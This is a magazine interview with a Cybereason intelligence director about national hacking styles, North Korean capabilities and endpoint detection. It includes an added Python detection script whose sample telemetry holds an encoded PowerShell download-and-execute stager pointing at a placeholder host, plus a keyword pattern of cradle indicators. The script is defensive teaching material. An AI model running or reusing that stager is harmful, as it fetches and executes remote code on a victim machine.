Cybereason’s Senior Director of Intelligence Ross Rustici on differing national cyber cultures, North Korean infosec capabilities and the failure rate of perimeter protection
As cybersecurity startups go, Cybereason is a little different. The Boston-headquartered, machine-learning-driven endpoint security vendor was founded in Tel Aviv by a team of Unit 8200 veterans (the Israel Defense Forces’ signals intelligence and cyber unit).
With clients including Japan’s Softbank (now also an investor) and Lockheed Martin, it aims to apply a combination of military-acquired skills and cloud-powered machine learning to endpoint detection and response.
Ross Rustici, Cybereason’s Senior Director of Intelligence Services, has a background at the US Department of Defense.
He joined Computer Business Review for a chat in London to discuss Cybereason’s toolkit and the increasingly blurred lines between nation states, cybercriminals and hacktivists.
Tell Me About Cybereason…
Our founders are ex-Israeli intelligence who worked on the offensive side. They basically wanted to build a tool that would catch themselves. We follow the kill chain model started by Lockheed Martin and try to interrupt every stage once an intruder’s inside a target network. So whether it’s endpoint visibility into the initial injection point, lateral movement or exfiltration, at all of those stages we have built detections that flag anomalies early, so you can see the full exploitation path and intervene fast.
How Big’s the Company?
We’ve doubled in size over the past 12 months to around 350 people. We’ve gone from startup mode to growth mode and are hoping to double revenue this year. Softbank, which was initially a customer, is our biggest investor. Charles River Ventures and Lockheed also have $25 million in the company.
What we do wouldn’t have been possible ten years ago without the computational power the cloud gives. [Cybereason is on AWS]. We have around 300 customers at the moment, some small, some with hundreds of thousands of endpoints, and our real-time graph is doing around eight million events per second in terms of processing what’s going on at a particular endpoint…
Many of you have an Intel or Military Background. How Much is the Increased Visibility of the Nation State in the Cyber Realm having a Security Impact?
It’s one of the largest complicating factors for the industry at large – we’re really the only industry that is going toe-to-toe with militaries on a regular basis. The landscape has changed a lot since the early 2000s, which was the Wild West with a lot of experimentation. Every country has taken a very different approach to it.
In What Sense?
You’ve got the old ‘spy game’ between Russia and the West that has its own form of gentleman’s honour. It’s very focussed on crown jewels and not getting caught. China has a very different approach that is influenced by the PLA’s history and then you have the North Koreas and Irans of this world who see cybersecurity as an equaliser; it allows them to reach out and touch people in a way they never could before.
How Legitimate a Cyber Threat is North Korea? It’s a Highly Isolated State After All with Poor Connectivity.
If they were operating from North Korea, that would be a fair point. They’re not. They are using much better Chinese and Southeast Asian fibre. They operate from at least half a dozen locations in places it is difficult to retaliate against. Technically, they are far better than most people give them credit for.
People have overlooked them as they’ve been focussed on East Asia, but you can trace their lineage and evolution through Chinese and South Korean reporting streams.
They’ve got onto the classified networks of the South Korean military, through which they probably have access to secret-level information on the US military. They’ve got into nuclear power plants. They’ve got into a lot of industrial control systems. They have the technical sophistication to do what they want. We generally don’t see their very top-tier tools because they simply don’t need them, but they stockpile zero-days and they use them.
You Mentioned that China has a very Different Approach to Russia when it comes to Hacking…
The Five Eyes community and Russia are prolific and very good, but they have typically gone after industries that are “acceptable”: defense contractors, government agencies, some of the international organisations.
There is a lot of nefarious activity that goes on, but it’s generally confined to that traditional nation-state playground. China was very much outside that playground and they have a very different philosophy on intelligence collection.
Outside the Playground in What Sense?
They understand that the aggregate picture can inform just as well as crown-jewel intrusions, so while it would be really great to get the executive order that says explicitly what the US plans to do against China, they can assemble an 80-90 percent picture by putting all the open source materials together.
That’s partly cultural for the Chinese intelligence services; partly based on the fact that for a long time they didn’t have access to the information that the Russians and others have. They don’t have as global a presence; they don’t have as many legacy collection points as the old global players do.
The information revolution allowed them to leapfrog those legacy collection systems, but it is also being applied in the structure they’re operating under… so you saw the Chinese go very broad, and basically take on everyone. This is changing fast now, but it is based in part on a legacy People’s War mindset of ‘we have more people and munitions than any country, we can take more casualties than anybody else; just go conquer territory and if we lose territory, we can regain it, we have the resources…’
How Extensive is the Bleed Between the Nation State and Commercial Realm in terms of Cybersecurity?
There’s been a lot of bleed between nation states and cybercriminal communities. Some is intentional, some is accidental. On the offensive side, this is an ease-of-operations thing. Using freelancers gives plausible deniability; in China, the military is poorly paid and it’s easier to get tech talent freelance. In Russia, there’s the old boys’ network of former intel and organised crime who like to keep half a hand on the tiller.
On the Western side, you have lots of exposed toolkits that have brought nation state level capabilities to generic pen testing tools. This has increased the floor for hacking and resulted in a thick band of activity that sees cybercrime, cyberhacktivist and nation state actors playing at a similar level of sophistication in many instances, because the tools are good enough to do what they want and don’t need to be over-engineered.
What About the Defensive Side?
On the defensive side… we’re seeing a greater transfer of knowledge as a lot of people leave government with an inherent knowledge of adversaries and how they’re tracked, and bring those techniques to the private sector. You’ve also got a lot of government initiatives to try to spread that knowledge because of a desire for collective security: if we can bring everyone’s defenses up to a certain level, it gets a lot harder to operate. Ultimately, though, we’re not seeing as great a transfer of knowledge on the defensive side as we’re seeing on the offensive side… defense requires a lot of visibility and a lot of ability to play the adversary, and it’s less of a technical challenge.
What Do You Mean by Play the Adversary?
If you’re playing against the Chinese, it’s a different playbook to playing against the Russians. You can annoy and kick out a Chinese hacker in a different way. That’s a key part of threat modelling – playing the adversary as well as the tools. Most cybersecurity companies are very tool-focussed, and that’s also why cybersecurity has a 100 percent failure rate. Even the best companies all talk about not if, but when you’re breached.
If your main tool is meant to stop breaches, why is your PR talking about your ability to do remediation? The attacker always has more time. And if your security product is good enough, they’ll devote specific resources to reverse-engineering it to avoid it, or even use it to hack a network.
So How Does What you Do Differ?
From a tech perspective we’re about techniques rather than tools. Take lateral movement; there are only really five to ten main techniques for lateral movement… they’re all implemented differently but the core behaviour’s the same.
The core tech we do is a very lightweight probe on actual endpoints. It is basically a real-time grab of everything that’s happening on a laptop. You use machine learning to look for abnormalities on the edge case of that pattern. If your email attachment is spawning an Excel document that is jumping into a process never used on your laptop before, you’ve got an intrusion vector, lateral movement and an adversary that’s going after things. It takes raw processing power on a scale that wouldn’t have been possible until recently, but which can now be both incredibly powerful and subtle.
Give me an Example of Such Lateral Movements…
It might be pass-the-hash techniques, abnormal mounts of network drives, PowerShell… have you got someone lazily using Base64 encoding in a PowerShell script? Very few people are going to use that legitimately! Lots of adversaries have automated scripts that look very similar to what’s being used in a given environment, but which suddenly fork info to a place it’s never been before…
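The two behaviours Rustici describes above, an Office application spawning a script host and a Base64-encoded PowerShell command line, are easy to turn into concrete detection logic. The Python below is an added illustration for this article, not Cybereason’s product code and not anything from the interview; the process-creation events are constructed for the example, and the rule names, the indicator list and the `example.invalid` URL are assumptions. It also carries the caveat the quote only hints at: an encoded command is suspicious rather than conclusive, so the payload is decoded and inspected before it is escalated.

```python
"""Two endpoint detection rules, run over constructed process-creation events.

Added example, not Cybereason's product code. Events below are made up for the
demonstration; the rule names and the indicator list are the author's assumptions.
"""
import base64
import re
from pathlib import PureWindowsPath

# Parent/child pairs that are almost never legitimate: a document viewer has no
# business launching a script host.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}

# Strings common in stagers (download cradles, in-memory execution, nested
# encoding) and rare in routine admin scripts. Assumed list; extend per estate.
CRADLE_RE = re.compile(
    r"invoke-expression|\biex\b|downloadstring|downloadfile|frombase64string|"
    r"invoke-webrequest|net\.webclient|start-bitstransfer|-bxor",
    re.IGNORECASE,
)


def encode_ps(script):
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob):
    """Reverse encode_ps; return None if the argument is not a valid payload."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    return PureWindowsPath(path).name.lower()


def encoded_payloads(cmdline):
    """Yield the decoded script for every encoded-command switch on the line.

    powershell.exe accepts any unambiguous prefix of -EncodedCommand
    (-e, -en, -enc, ...) plus the alias -ec, so matching only the literal
    "-EncodedCommand" would miss most real-world stagers."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if not tok.startswith(("-", "/")):
            continue
        name = tok.lstrip("-/").lower()
        if name == "ec" or (name and "encodedcommand".startswith(name)):
            script = decode_ps(toks[i + 1].strip('"\''))
            if script is not None:
                yield script


def analyze(event):
    """Return the list of rule names an event trips (empty if nothing fired)."""
    findings = []
    parent, image = basename(event["parent"]), basename(event["image"])
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append("office-spawned-shell")
    if image in {"powershell.exe", "pwsh.exe"}:
        for script in encoded_payloads(event["cmdline"]):
            findings.append("encoded-powershell")
            # Encoding alone is suspicious, not conclusive: look at what was hidden.
            if CRADLE_RE.search(script):
                findings.append("download-cradle")
    return findings


def triage(events):
    """Map event index -> findings for every event that trips at least one rule."""
    return {i: f for i, e in enumerate(events) if (f := analyze(e))}


# Constructed sample telemetry (hypothetical hosts, paths and URL).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    # macro in an e-mailed spreadsheet launching a hidden, encoded stager
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + encode_ps(STAGER)},
    # scheduled admin script: plain -File, nothing encoded
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    # encoded, but the hidden script is a harmless one-liner: worth a look, not an alert
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand "
                + encode_ps("Get-Service | Where-Object Status -eq Running")},
]

if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(findings)}")
```

Running it flags the first event on all three rules and the third on `encoded-powershell` only; the admin job in the middle is silent. Two design points matter in practice: the payload is UTF-16LE before it is Base64, so a naive `b64decode().decode()` produces mojibake and misses every indicator, and the short switch prefixes (`-e`, `-ec`) are what attackers actually type, so a rule that greps for `-EncodedCommand` is mostly decorative. A real deployment would also join these findings to the parent-process lineage and the network destination, which is the “path” view the interview describes.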
Say I’m a Potential Client, How does this Work? A Licensing Agreement?
You pay per user; licensing per endpoint. It’s a weekend roll-out and the probe itself is incredibly lightweight. The EDR (endpoint detection and response) product runs in user space. If you want our next-gen AV and some of the protection modules, that’s in kernel space; so you have that choice of really ‘do no harm’ in user space, or prevention in the kernel. But we have a very good track record of not causing system issues. As mentioned, the data is processed back in the cloud, with a lot of modelling and patterning, without a hit to the local CPU. It’s a very scalable architecture. Most of our leadership comes from the public sector, so there’s an intrinsic do-good element to the company.